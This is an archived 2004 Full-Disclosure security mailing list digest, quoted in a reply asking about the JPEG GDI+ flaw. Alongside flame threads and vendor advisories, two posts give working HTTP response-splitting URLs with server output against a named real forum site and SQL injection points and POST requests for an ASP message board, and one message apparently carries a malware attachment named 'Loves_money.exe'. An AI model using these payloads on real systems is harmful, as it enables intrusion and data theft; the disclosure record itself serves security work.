Message-ID: <814b9d50409271112709f5c13@mail.gmail.com>
From: milw0rm at gmail.com (milw0rm Inc.)
Subject: Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs
JPEG GDI problem,
Isn't this problem only capable of running if the jpeg was opened via
the users actions?
Is it possible that webpages could be affected with jpegs with
internet explorer viewing them? I wouldn't think so since what I have
read from multiple people's articles that it isn't this kind of bug.
Info needed.
Regards,
str0ke
On Mon, 27 Sep 2004 12:00:05 -0400,
full-disclosure-request@...ts.netsys.com
<full-disclosure-request@...ts.netsys.com> wrote:
>
> Today's Topics:
>
> 1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar)
> 2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> repeat 9/11 (Ron DuFresne)
> 3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
> 4. SANS GDIscan (bashis)
> 5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax)
> 6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
> 7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software)
> 8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK)
> 9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
> 10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald)
> 11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
> 12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
> 13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
> 14. Re: Msg reply (Elvi)
> 15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm (Thierry Carrez)
> 16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm (Thierry Carrez)
> 17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce@...ts.debian.org)
>
> --__--__--
>
> Message: 1
> From: "Exibar" <exibar@...lair.com>
> To: "ASB" <abaker@...il.com>, <full-disclosure@...ts.netsys.com>
> Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 12:15:26 -0400
>
> Exactly. Some idiot decided to program the entire system to shut down after
> 49 days. What an idiot, why not just setup a maintenance program to perform
> a scheduled re-boot of the system instead of having an automated process
> shut down the system and then have to schedule a work around for this by
> scheduling a manual boot every 30 days (which someone forgot).
>
> This whole thing wasn't Windows' fault, but an idiot
> programmer/manager/whatever fault.
>
> Exibar
>
> > -----Original Message-----
> > From: ASB [mailto:abaker@...il.com]
> > Sent: Sunday, September 26, 2004 10:56 AM
> > To: full-disclosure@...ts.netsys.com
> > Subject: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> > repeat 9/11
> >
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Next time, please read the thread in context.
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > The context of the thread is that an application issue is being
> > incorrectly interpreted as an OS issue.
> >
> >
> > -ASB
> >
> > On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald
> > <bkfsec@....lonestar.org> wrote:
> > > ASB wrote:
> > >
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >Where issues like this relate to the OS is in the fact that the OS
> > > >itself shouldn't be brought down by a poorly designed app.
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >And where in that article did you read that the OS was brought down by
> > > >a poorly designed app?
> > > >
> > > >
> > > >
> > > I didn't... I was responding to a point that was made about applications
> > > being responsible for system failures.
> > >
> > > >
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >
> > > >>Was it MS Windows that actually held the code that brought
> > > >>the system down?
> > > >>
> > > >>
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >The article was pretty clear:
> > > >
> > > ><snip>
> > > >
> > > >How you managed to read "OS failure" into this is rather astounding...
> > > >
> > > >
> > > >
> > > >
> > > How you manage to get up in the morning is rather astounding.
> > >
> > > Next time, please read the thread in context.
> > >
> > > Also, if you think that that's a detailed assessment of the problem,
> > > you're not too bright.
> > >
> > > So try and think a little harder next time, and not be so abrasive.
> > > You may be having a bad day (most likely due to your poor attitude) but
> > > don't take your own misunderstanding out on others, mmkay?
> > >
> > > -Barry
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
>
> --__--__--
>
> Message: 2
> Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
> From: Ron DuFresne <dufresne@...ternet.com>
> To: Exibar <exibar@...lair.com>
> cc: ASB <abaker@...il.com>, <full-disclosure@...ts.netsys.com>
> Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> repeat 9/11
>
> On Sun, 26 Sep 2004, Exibar wrote:
>
> > Exactly. Some idiot decided to program the entire system to shut down after
> > 49 days. What an idiot, why not just setup a maintenance program to perform
> > a scheduled re-boot of the system instead of having an automated process
> > shut down the system and then have to schedule a work around for this by
> > scheduling a manual boot every 30 days (which someone forgot).
> >
>
> Which, likely in this case, would have to somehow be monitored, seems to
> be a pretty critical application, one in which lives are dependant, and it
> is entirely possible the system might not recover from a reboot.
>
> Thanks,
>
> Ron DuFresne
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
> --__--__--
>
> Message: 3
> From: "RandallM" <randallm@...mail.com>
> To: <full-disclosure@...ts.netsys.com>
> Date: Sun, 26 Sep 2004 12:02:20 -0500
> Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
>
> What exactly would one gain by creating a PoC on this exploit?
> How exactly does this compare to meaningful disclosures that were
> revealed because someone would not listen or ignored the warnings
> of their security vulnerability.
>
> I mean, this is nothing like a program goof that allows clear-text
> Passwords or exposes files or the like. This exploit (if it can be
> called that) took a lot of thought to create it and exploit it.
>
> Correct me if I'm wrong but it does not fall in to the category
> of "exploit" as defined by this list. This was truly a "created Exploit"
> that would not be there otherwise. This took intelligent input.
>
> This is nothing more than a black-hat attack. It is not a meaningful
> revealing of poor security as I've seen defined on this list.
>
> <|>-- __--__--
> <|>
> <|>Message: 13
> <|>From: "i.t " <fulldis@...7.dyndns.org>
> <|>Organization: i.t consulting
> <|>To: full-disclosure@...ts.netsys.com
> <|>Date: Sun, 26 Sep 2004 11:57:33 +0200
> <|>Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
> <|>
> <|>
> <|>> On Saturday 25 September 2004 16:59, raza wrote:
> <|>> > I just compiled this and it works well..
> <|>> >
> <|> ...
> <|>> yes and it works very well.
> <|>> > I can see this ones gaana be fun...
> <|>> We'll have a worm within days.
>
> <|>
> <|>for nearly all of my clients using win xp I've deinstalled
> <|>win messenger.
> <|>one urgently wanted it back for communicating in real-time;
> <|>and, of course,
> <|>it's much more fun seeing a live picture of the
> <|>counterpart(s) in the chat
> <|>window...
> <|>
> <|>even having installed sp2 and the newest patches plus AV I
> <|>can imagine a virus
> <|>spreading within those pictures throughout the whole msn and so on...
> <|>any other defense?
> <|>or is this too much paranoia?
> <|>
> <|>i.t
> <|>
> <|>
> <|>-- __--__--
>
> --__--__--
>
> Message: 4
> To: full-disclosure@...ts.netsys.com
> Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
> From: bashis <mcw@....se>
> Reply-To: mcw@....se
> Subject: [Full-Disclosure] SANS GDIscan
>
> Hi
>
> I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLL's after
> installing all available patches from M$..
>
> WinXP Pro SP1
> C:\WINDOWS\system32\gdiplus.dll
> Version: 5.1.3097.0 <-- Vulnerable version
>
> Win2k Server SP4
> C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
> Version: 5.1.3097.0 <-- Vulnerable version
>
> [1]
> http://isc.sans.org/gdiscan.php
>
> Have a nice day
> /bashis
>
> --__--__--
>
> Message: 5
> From: "pigrelax" <pigrelax@...dex.ru>
> To: <full-disclosure@...ts.netsys.com>
> Cc: <bugtraq@...urityfocus.com>, <info@...soft.com>
> Date: Sun, 26 Sep 2004 21:56:44 +0400
> Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum
>
> URL: http://www.pd9soft.com
> Tested megabbs 2.1
>
> 1. HTTP Response Splitting
> http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
> d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
> text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
> atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
>
> Result:
>
> <...>
> HTTP/1.1 302 Object moved
> Connection: close
> Date: Sun, 26 Sep 2004 14:14:02 GMT
> Server: Microsoft-IIS/6.0
> Location: /megabbs/forums/forum-view.asp?fid=
> Content-Length: 0
>
> HTTP/1.0 200 OK
> Content-Type: text/html
> Content-Length: 33
>
> <html>Scanned by Maxpatrol</html>
>
> Content-Length: 290
> Content-Type: text/html
> Expires: Sun, 26 Sep 2004 14:13:02 GMT
> Set-Cookie: guestID=309; path=/
> Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
> Cache-contro
> <...>
>
> 2. HTTP Response Splitting
> http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
> th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
> ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
> %0d%0a&action=writenew&displaytype=flat
>
> Result:
> <...>
> HTTP/1.1 302 Object moved
> Connection: close
> Date: Sun, 26 Sep 2004 14:34:05 GMT
> Server: Microsoft-IIS/6.0
> Location: /megabbs/forums/forum-view.asp?fid=
> Content-Length: 0
>
> HTTP/1.0 200 OK
> Content-Type: text/html
> Content-Length: 33
>
> <html>Scanned by Maxpatrol</html>
>
> Content-Length: 290
> Content-Type: text/html
> Expires: Sun, 26 Sep 2004 14:33:05 GMT
> Set-Cookie: guestID=421; path=/
> Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
> Cache-contro
> <...>
>
> 3. More and more SQL injection:
> ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
> ladder-log.asp?categoryid=1&filter=id&criteria=1'
> view-profile.asp?type=single&memberid=1'
> view-profile.asp?type=team&teamid=1'
>
> MaxPatrol is a professional network security scanner distinguished by its
> uncompromisingly high quality of scanning, optimized for effective use by
> companies of any size (serving from a few to tens of thousands of nodes).
> MaxPatrol developers were able quite simply to "ignore" about 40% of the
> newly published vulnerabilities because their product's intelligent
> algorithms had already detected them.
> http://www.Maxpatrol.com
>
> --__--__--
>
> Message: 6
> From: "pigrelax" <pigrelax@...dex.ru>
> To: <full-disclosure@...ts.netsys.com>
> Cc: <bugtraq@...urityfocus.com>
> Date: Mon, 27 Sep 2004 00:09:32 +0400
> Subject: [Full-Disclosure] SQL injection in BroadBoard Instant ASP Message Board
>
> BroadBoard Instant ASP Message Board
>
> URL: http://www.broadboard.com/
>
> 1. software does not properly validate user-supplied input in the 'keywords'
> parameter in search.asp:
> http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL
> code]&method=1&method=1&body=1&subject=1&board=1&results=1
>
> 2. software does not properly validate user-supplied input in the 'handle'
> parameter in profile.asp:
> http://broadboard/forum/profile.asp?handle=['SQL code]
>
> 3. software does not properly validate user-supplied input in the
> 'txtUserHandle' parameter in reg2.asp:
>
> POST /forum/reg2.asp HTTP/1.1
> Host: broadboard
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 121
> txtNameFirst=1&txtNameLast=1&txtUserEmail=sales@...patrol.com&txtUserHandle=
> ['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1
>
> 4. software does not properly validate user-supplied input in the
> 'txtUserEmail' parameter in forgot.asp:
>
> POST /forum/forgot.asp HTTP/1.1
> Host: broadboard
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 24
> txtUserEmail=['SQL code]&cmdSend=1
>
> MaxPatrol is a professional network security scanner distinguished by its
> uncompromisingly high quality of scanning, optimized for effective use by
> companies of any size (serving from a few to tens of thousands of nodes).
> MaxPatrol developers were able quite simply to "ignore" about 40% of the
> newly published vulnerabilities because their product's intelligent
> algorithms had already detected them.
> http://www.Maxpatrol.com
>
> --__--__--
>
> Message: 7
> Date: Sun, 26 Sep 2004 13:50:50 -0500
> From: PD9 Software <info@...soft.com>
> CC: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
> Subject: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
>
> pigrelax wrote:
>
> >URL: http://www.pd9soft.com
> >Tested megabbs 2.1
> >
> >1. HTTP Response Splitting
> >2. HTTP Response Splitting
> >3. More and more SQL injection:
> >
>
> All three issues have been addressed, and updates have been posted at
> http://www.pd9soft.com/. Thank you for bringing them to my attention.
>
> However in the future, would it be too much to ask that I am contacted
> first? I am very eager to fix any security vulnerabilities, but sipping
> coffee on a lazy Sunday afternoon and seeing this broadcast to a public
> list is a little disconcerting.
>
> Thanks,
> Matt Summers
> PD9 Software, Inc
>
> --__--__--
>
> Message: 8
> Date: Sun, 26 Sep 2004 23:12:42 +0100
> From: DanB UK <danbuk@...il.com>
> Reply-To: DanB UK <danbuk@...il.com>
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
>
> It seems like the OP was actually just trying to advertise their (or
> affiliates) product.
> I would say that it's not the 'done' thing.
> > However in the future, would it be too much to ask that I am contacted
> > first? I am very eager to fix any security vulnerabilities, but sipping
> > coffee on a lazy Sunday afternoon and seeing this broadcast to a public
> > list is a little disconcerting.
> I understand your concern.
>
> Regards,
> Daniel
> --
> DanB UK
> London, UK
>
> --__--__--
>
> Message: 9
> From: "joe" <mvp@...ware.net>
> To: "'devis'" <devis@...ynix.net>
> Cc: <full-disclosure@...ts.netsys.com>
> Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 18:42:29 -0400
>
> I get paid nothing to hang out on this list. In fact many of my friends feel
> I am wasting considerable time here because the vast majority of the people
> are Linux bigots simply holding each others', ummm, hands.
>
> Once in a while though some seriously good information or conversation
> occurs here which is why I like to hang out and most of my responses tend to
> be offlist. Occasionally I like to dampen some of the occasional this or
> that about how bad Windows sucks from people who don't know enough about how
> it works to even have a very good opinion. They are intelligent people
> mostly, they just have a hamster up their bum about billg or MS for some
> reason.
>
> It is funny to me how this thread came onto the list as a "Windows sucks"
> thread when it should have been a serious, "some programmers don't
> understand data types sucks" thread. It is poor programming habits like this
> that cause a great deal of the flaws in apps and OSes that others take
> advantage of. Programmers need to understand the proper way to handle the
> datatypes they use in their applications, whether it be checking for data
> size constraints or data range constraints.
>
> As for missing out on cash or something from MS, I am not so sure MS would
> have me as an employee at the moment as I spend considerable time banging on
> them and their OS and choices. I don't do it out in the public lists like
> this as I am trying to be a righteous d00d to all of you cool people. I bang
> on them in the private groups that have MS people seriously looking to make
> things better.
>
> For this specific thread, my main point is that someone who can't figure out
> that an unsigned integer value that is incrementing will roll at some point
> is a dangerous programmer no matter what OS they are on. This has nothing to
> do with Windows or any OS. It is how computers work period. There isn't a
> single OS out there that you could constantly increment a 32 bit unsigned
> counter and not roll to zero. This is way below anything the OS can control.
> At best it halts the program as soon as the overflow kicks. That really
> wouldn't help much except possibly with data corruption. I don't think an OS
> should be protecting apps from data corruption due to the app losing count
> though.
>
> joe
>
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of devis
> Sent: Saturday, September 25, 2004 12:49 PM
> Cc: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> Joe dude, how much u are getting from M$ a month to hang around this list ?
> Zero ? Noway....send em a letter now dude.
> And please don't serve me, 'just being objective crap', you HAVE to be
> interested to defend it that well., if not, well, you may be missing on
> something...
>
> joe wrote:
>
> >Definitely some interesting theories Ron.
> >
> >
> >
> >>1> the code was better done under the original OS, unix
> >>
> >>
> >
> >While possible, nothing actually points at this as being the case.
> >Anyway, I would be curious as to the functionality of the system when
> >it was first launched on UNIX versus the end-result. Put this on
> >Windows and run it 10 years and then port to UNIX or *nix and there
> >will almost certainly be screwups there as well. In fact, I would be
> >pretty confident. I have dealt with poor ports to and from Windows and
> >*nix. I have even dealt with bad ports from Mainframes to UNIX where
> >the whole time the Mainframe people were saying the same types of
> >things about UNIX that you like to say about Windows. Being a good
> >coder for one OS doesn't make you one for all Oses when dealing with system
> >level components and interfaces.
> >
> >
> >
> >
> >>2> considering "how often" you seems to run into this same
> >>issue with other coders in the windows realm, windows coders tend to
> >>be especially lazy/clueless as compared to coders in other OS'
> >>
> >>
> >
> >I would expect the issue is the same as always. Sheer volume. There are
> >good and bad coders period. Microsoft has surely drawn more poor coders
> >than any other OS with its pushing of the RAD/simple coding environment
> >such as VB.
> >Additionally the Windows environment as a whole has more inexperienced
> >users and admins and people likely to try and code. There are also many
> >good ones as well, they are just well buried in the poor ones.
> >
> >
> >
> >
> >>3> tools to code with in the windows realm are not as developed/functional
> >>as they are in other envs
> >>
> >>
> >
> >I would say this opinion is uninformed.
> >
> >
> >
> >
> >>4> M$ does not properly provide developers with clued information with
> >>which to do their jobs
> >>
> >>
> >
> >This is another opinion which I would call rather uninformed.
> >
> >Even if there was poor function documentation, if you have a function,
> >any function returning a constantly increasing counter you know, as a
> >skilled programmer, that eventually it has to do something other than
> >increase. If the value is signed the sign bit will flip or if it is
> >unsigned it will roll to 0. How can a good programmer think any other
> >thing? The compiler could have inserted exception handling code but at
> >best that is simply going to bounce the program out of a normal running
> >state. That is a compiler thing though, not an OS thing. I do hope you
> >aren't trying to tell me that UNIX can magically and infinitely
> >maintain a counter on a variable with a fixed bit size. I try to consider
> >you to be a bit more intelligent than that.
> >
> >
> >
> >To put it in another way, if you have a set of tires on a car that are
> >rated for 75 MPH (say off road truck tires) and some person goes 90 and
> >the tires fly apart or the vehicle flips or both, is the issue the
> >driver, the vehicle manufacturer, the tire manufacturer, or the tree
> >that produced the rubber for the tire? This is the same sort of case.
> >You have it in your mind ahead of time who you want to be at fault
> >because you have a bug up your bum about it and work to prove that stance.
> >
> >Poor coding is a result of poor coders. I have seen amazingly bad code
> >on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to
> >Windows to DOS to VMS. I have also seen some amazingly good stuff on
> >the same platforms. Someone who doesn't understand basic data types and
> >how to handle their limits is going to do a shitty job on all of the
> >platforms.
> >
> >Is the ratio of good admins to bad admins better in UNIX versus Windows?
> >Absolutely. Is the ratio of good programmers to bad programmers better
> >in UNIX versus Windows? Most certainly. Does this mean all Windows
> >admins are bad admins, obviously not. Does this mean all Windows
> >programmers are bad programmers, obviously not. I specifically say UNIX
> >versus *nix because I think *nix is one or more steps closer to Windows
> >in this discussion and getting closer as its popularity grows with
> >Windows users. Switching to *nix doesn't make the admins or coders
> >switching (or just using in tandem) any better simply because they
> >switched.
> >
> >
> >
> >
> >
> >
> >
> >-----Original Message-----
> >From: Ron DuFresne [mailto:dufresne@...ternet.com]
> >Sent: Friday, September 24, 2004 11:25 PM
> >To: joe
> >Cc: mcw@....se; full-disclosure@...ts.netsys.com
> >Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat
> >9/11
> >
> >On Fri, 24 Sep 2004, joe wrote:
> >
> >
> >
> >>Again, there are valid uses of GetTickCount and there are safe ways of
> >>doing so. If there is concern, I do recommend testing functionality
> >>associated with each of the DLLs. You might find a bug you can report
> >>for kudos.
> >>
> >>On the incident, I would guess the vendor never had a clue it would do
> >>that.
> >>
> >>That function can't return more than 49.7 days without breaking every
> >>app that currently uses it. MS can not do that. That is why there is
> >>another function to get the info with a different datatype. See my
> >>other posts.
> >
> >
> >
> >What seems to read clearly from your replies to this thread is that
> >either;
> >
> >1> the code was better done under the original OS, unix
> >
> >2> considering "how often" you seems to run into this same issue with
> >other coders in the windows realm, windows coders tend to be especially
> >lazy/clueless as compared to coders in other OS'
> >
> >3> tools to code with in the windows realm are not as developed/functional
> >as they are in other envs
> >
> >4> M$ does not properly provide developers with clued information with
> >which to do their jobs
> >
> >
> >From which you can combine any or all of the above for a correct
> >interpretation of the total of your replies.
> >
> >Thanks,
> >
> >Ron DuFresne
> >--
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >"Cutting the space budget really restores my faith in humanity. It
> >eliminates dreams, goals, and ideals and lets us get straight to the
> >business of hate, debauchery, and self-annihilation." -- Johnny Hart
> > ***testing, only testing, and damn good at it too!***
> >
> >OK, so you're a Ph.D. Just don't touch anything.
> >
>
> --__--__--
>
> Message: 10
> Date: Sun, 26 Sep 2004 20:41:34 -0400
> From: Barry Fitzgerald <bkfsec@....lonestar.org>
> To: ASB <abaker@...il.com>
> CC: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> ASB wrote:
>
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >Next time, please read the thread in context.
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> >The context of the thread is that an application issue is being
> >incorrectly interpreted as an OS issue.
> >
> >
> >
> >
>
> Oversimplification is for the foolish. Like I said, you're not too bright.
>
> You're showing very little understanding of system architecture here.
> My point regarding where the code was located had to do with a
> generalized statement regarding applications being at fault for issues
> and for them not being OS issues. My point was that it's not always
> clear cut.
>
> I was not trying to say that this case was an OS issue. I was trying to
> say that the line is not always black and white. I was also pointing
> out that none of us know because the only information we have to go on
> is third-hand and imprecise. If you can predict conditions based on
> imprecise third-hand information, then what are you doing here?!? Go
> solve the world's problems or something. of course, you can't so you've
> decided to just flame people.
>
> Please re-read my posts and think before you respond.
>
> If, besides misreading my posts, you can find no argument with what I've
> said (which, you won't, because I'm right) then I'm willing to hear
> them. Other than that, you're just wasting everyone's time by trying to
> railroad points that you don't understand.
>
> -Barry
>
> --__--__--
>
> Message: 11
> From: "Vince Able" <we_hate_vince@...mail.com>
> To: <full-disclosure@...ts.netsys.com>
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 21:24:27 -0400
> Organization: The Ram Group
>
> Well what a nice first post to read entering Full-Disclosure. LoL
> ----- Original Message -----
> From: "Barry Fitzgerald" <bkfsec@....lonestar.org>
> To: "ASB" <abaker@...il.com>
> Cc: <full-disclosure@...ts.netsys.com>
> Sent: Sunday, September 26, 2004 8:41 PM
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> > ASB wrote:
> >
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >Next time, please read the thread in context.
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >
> > >The context of the thread is that an application issue is being
> > >incorrectly interpreted as an OS issue.
> > >
> > >
> > >
> > >
> >
> > Oversimplification is for the foolish. Like I said, you're not too
> > bright.
> >
> > You're showing very little understanding of system architecture here.
> > My point regarding where the code was located had to do with a
> > generalized statement regarding applications being at fault for issues
> > and for them not being OS issues. My point was that it's not always
> > clear cut.
> >
> > I was not trying to say that this case was an OS issue. I was trying to
> > say that the line is not always black and white. I was also pointing
> > out that none of us know because the only information we have to go on
> > is third-hand and imprecise. If you can predict conditions based on
> > imprecise third-hand information, then what are you doing here?!? Go
> > solve the world's problems or something. of course, you can't so you've
> > decided to just flame people.
> >
> > Please re-read my posts and think before you respond.
> >
> > If, besides misreading my posts, you can find no argument with what I've
> > said (which, you won't, because I'm right) then I'm willing to hear
> > them. Other than that, you're just wasting everyone's time by trying to
> > railroad points that you don't understand.
> >
> > -Barry
>
> --__--__--
>
> Message: 12
> Date: Sun, 26 Sep 2004 22:36:12 -0400
> From: ASB <abaker@...il.com>
> Reply-To: ASB <abaker@...il.com>
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> There was more than enough information provided in the initial link,
> besides what was available to those who took a moment or 3 to search
> for additional info, to avoid coming to the conclusion that the OS was
> the fault here.
>
> The mere fact that thousands, if not millions of people manage to run
> Windows 2000 systems which do not keel over every 49.7 days, would
> tend to cause one to look elsewhere for the source of the issue.
> Beyond that, the wording of the various articles on this issue that I
> looked at, made it rather obvious that there was an issue with the
> APPLICATION which rendered it useless if certain operator steps were
> not performed. No matter how scanty you feel the articles were, they
> never even implied that the OS was inoperable during any of this.
>
> While it is certainly important to have as much information as
> possible before rendering verdicts of any sort, and while not every
> issue can be definitively outlined as jet black or lily white, there's
> not a whole lot more forensics that's needed to conclude that the root
> of the issue is one of application development, compounded by the
> failure of an operator to perform a prescribed workaround at the
> appointed time.
>
> The irony here is that you're accusing me of not reading or comprehending.
>
> -ASB
>
> On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald
> <bkfsec@....lonestar.org> wrote:
> > ASB wrote:
> >
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >Next time, please read the thread in context.
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >
> > >The context of the thread is that an application issue is being
> > >incorrectly interpreted as an OS issue.
> > >
> > >
> > >
> > >
> >
> > Oversimplification is for the foolish. Like I said, you're not too bright.
> >
> > You're showing very little understanding of system architecture here.
> > My point regarding where the code was located had to do with a
> > generalized statement regarding applications being at fault for issues
> > and for them not being OS issues. My point was that it's not always
> > clear cut.
> >
> > I was not trying to say that this case was an OS issue. I was trying to
> > say that the line is not always black and white. I was also pointing
> > out that none of us know because the only information we have to go on
> > is third-hand and imprecise. If you can predict conditions based on
> > imprecise third-hand information, then what are you doing here?!? Go
> > > solve the world's problems or something. Of course, you can't, so you've
> > decided to just flame people.
> >
> > Please re-read my posts and think before you respond.
> >
> > If, besides misreading my posts, you can find no argument with what I've
> > said (which, you won't, because I'm right) then I'm willing to hear
> > them. Other than that, you're just wasting everyone's time by trying to
> > railroad points that you don't understand.
> >
> > -Barry
>
> --__--__--
>
> Message: 13
> Date: Sun, 26 Sep 2004 22:20:29 -0700
> From: r00t3d <r00t3d@...il.com>
> Reply-To: r00t3d <r00t3d@...il.com>
> To: randallm@...mail.com, full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
>
> Dear RandallM,
>
> >This exploit (if it can be called that) took a lot of thought to
> >create it and exploit it.
>
> Yea, lots of thought, and ripped shellcode to boot! Can't beat that can ya?
>
> >Correct me if I'm wrong but it does not fall in to the category
> >of "exploit" as defined by this list.
>
> Okay, you're wrong.
>
> >This was truly a "created Exploit"
>
> Seriously? I didn't know exploits were "created" I always thought they
> just appeared.
>
> >This is nothing more than a black-hat attack. It is not a meaningful
> >revealing of poor security as I've seen defined on this list.
>
> Uh oh, are the blaqhats after us again?? I think we had all better
> just pull our whitehats down over our heads and hope they go away. I
> hear, if you don't move, the blaqhats won't notice you and will leave,
> kind of like with bears. Anyways, last time I checked, it wasn't
> blaqhats that disclosed exploits, it was whitehats and scene whores.
>
> Love,
> #MSNetworks
>
> --__--__--
>
> Message: 14
> Date: Mon, 27 Sep 2004 09:03:35 +0200
> To: "Full-disclosure" <full-disclosure@...ts.netsys.com>
> From: "Elvi" <elvi52001@...oo.com>
> Subject: [Full-Disclosure] Re: Msg reply
>
> ----------tthzhwewredcturxosqp
> Content-Type: text/html; charset="us-ascii"
> Content-Transfer-Encoding: 7bit
>
> <html><body>
>
> <br>
> </body></html>
>
> ----------tthzhwewredcturxosqp
> Content-Type: application/octet-stream; name="Loves_money.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Loves_money.exe"
>
> ----------tthzhwewredcturxosqp--
>
> --__--__--
>
> Message: 15
> Date: Mon, 27 Sep 2004 11:44:23 +0200
> From: Thierry Carrez <koon@...too.org>
> Organization: Gentoo Linux
> To: gentoo-announce@...too.org
> CC: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
> security-alerts@...uxsecurity.com
> Subject: [Full-Disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm
>
> This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: text/plain; charset=ISO-8859-1
> Content-Transfer-Encoding: 7bit
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200409-34
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: X.org, XFree86: Integer and stack overflows in libXpm
> Date: September 27, 2004
> Bugs: #64152
> ID: 200409-34
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> libXpm, the X Pixmap library that is a part of the X Window System,
